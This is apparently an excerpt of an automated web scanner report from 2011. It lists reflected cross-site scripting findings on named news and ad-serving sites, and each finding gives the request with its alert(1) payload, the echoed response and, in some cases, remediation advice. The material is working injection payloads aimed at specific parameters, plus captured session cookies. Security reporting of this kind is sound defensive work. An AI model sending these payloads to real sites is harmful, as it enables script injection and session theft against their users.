Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:28 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74519

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST6BE1A\\';ALERT(1)//B579F80B78C&amp;adid=11009420&amp;advid=1360889" class="t-rop-ad-anchor" target="" id="rop-ad/11009420-300x460">
...[SNIP]...
2.122. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [viewmore parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the viewmore request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dec08\'%3balert(1)//ffa7e553f8f was submitted in the viewmore parameter. This input was echoed as dec08\\';alert(1)//ffa7e553f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3Edec08\'%3balert(1)//ffa7e553f8f&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:14 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68549

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/" title="Click to view more Advertisers" target="">View more &gt;dec08\\';alert(1)//ffa7e553f8f</a>
...[SNIP]...
2.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 301af'-alert(1)-'55b63ce7126 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html301af'-alert(1)-'55b63ce7126&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:19 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:33:19 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:33:19 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:19 GMT; path=/
Set-Cookie: _curtime=1305207199; domain=pubmatic.com; expires=Thu, 12-May-2011 14:43:19 GMT; path=/
Set-Cookie: pubfreq_25277_19976_1033750466=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:13:19 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:19 GMT; path=/
Content-Length: 1558

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9933739605160317|cb=1305207199|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
height=90&kltstamp=1305207199&indirectAdId=0&adServerOptimizerId=2&ranreq=0.5169705713633448&campaignId=1873&creativeId=0&pctr=0.000000&pixelId=1039&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html301af'-alert(1)-'55b63ce7126">
...[SNIP]...
2.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb4f'-alert(1)-'c857c4e6058 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448eeb4f'-alert(1)-'c857c4e6058&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:20 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:33:20 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:33:20 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:20 GMT; path=/
Set-Cookie: pubfreq_25277_19976_1883964808=661-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:13:20 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:20 GMT; path=/
Content-Length: 1753

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAL1iAAAIT
...[SNIP]...
eId=25277&adId=19976&adServerId=661&kefact=1.299975&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kltstamp=1305207200&indirectAdId=24818&adServerOptimizerId=1&ranreq=0.5169705713633448eeb4f'-alert(1)-'c857c4e6058&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html">
...[SNIP]...
2.125. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c08f"><script>alert(1)</script>b6dbed5532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news8c08f"><script>alert(1)</script>b6dbed5532a/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:06 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 134351975
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news8c08f"><script>alert(1)</script>b6dbed5532a/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...
2.126. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f799"><script>alert(1)</script>b868d2523b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/20113f799"><script>alert(1)</script>b868d2523b/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:07 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 946343016
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/20113f799"><script>alert(1)</script>b868d2523b/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...
2.127. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae9f"><script>alert(1)</script>80eb65e6163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/maycae9f"><script>alert(1)</script>80eb65e6163/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074518
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/maycae9f"><script>alert(1)</script>80eb65e6163/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...
2.128. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47efa"><script>alert(1)</script>8b4c9f9ffa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/may/1247efa"><script>alert(1)</script>8b4c9f9ffa/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:11 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 1603506712
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/may/1247efa"><script>alert(1)</script>8b4c9f9ffa/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...
2.129. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b694c"><script>alert(1)</script>1fa13f77dcf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/may/12/heder-here-in-this-spp-pppppb694c"><script>alert(1)</script>1fa13f77dcf/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:12 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 2061608789
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-pppppb694c"><script>alert(1)</script>1fa13f77dcf/" method="post" id="loginform1">
...[SNIP]...
2.130. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The value of the callingurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d0"><img%20src%3da%20onerror%3dalert(1)>0753613c8b936b7cc was submitted in the callingurl parameter. This input was echoed as 125d0"><img src=a onerror=alert(1)>0753613c8b936b7cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /pcworldconnect/comment_registration?callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html125d0"><img%20src%3da%20onerror%3dalert(1)>0753613c8b936b7cc HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:21 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=37DBA5BF4885B3CA496B7FAFE45B1DC7; Path=/
Vary: Accept-Encoding
Content-Length: 6275


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<input type="hidden" id="callingurl" name="callingurl" value="http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html125d0"><img src=a onerror=alert(1)>0753613c8b936b7cc" />
...[SNIP]...
2.131. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf8f'-alert(1)-'4b23fb4be7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773fbf8f'-alert(1)-'4b23fb4be7c HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:55 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:29:55 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 100861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<script type="text/javascript">
(function() {
var toolbar = new CNB.Toolbar('toolbar-207595', {
'cid': '207595',
'serviceCid': 'desktop_5773fbf8f'-alert(1)-'4b23fb4be7c',
'title': 'Can Intel Cedar Trail Atom processors, along with Google Chromebooks, resurrect the netbook?',
'summary': 'Pity the poor netbook. Once tech&rsquo;s darling, it&rsquo;s been
...[SNIP]...
2.132. http://www.zdnet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937ea"><a>15ddfa8a42c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /937ea"><a>15ddfa8a42c HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
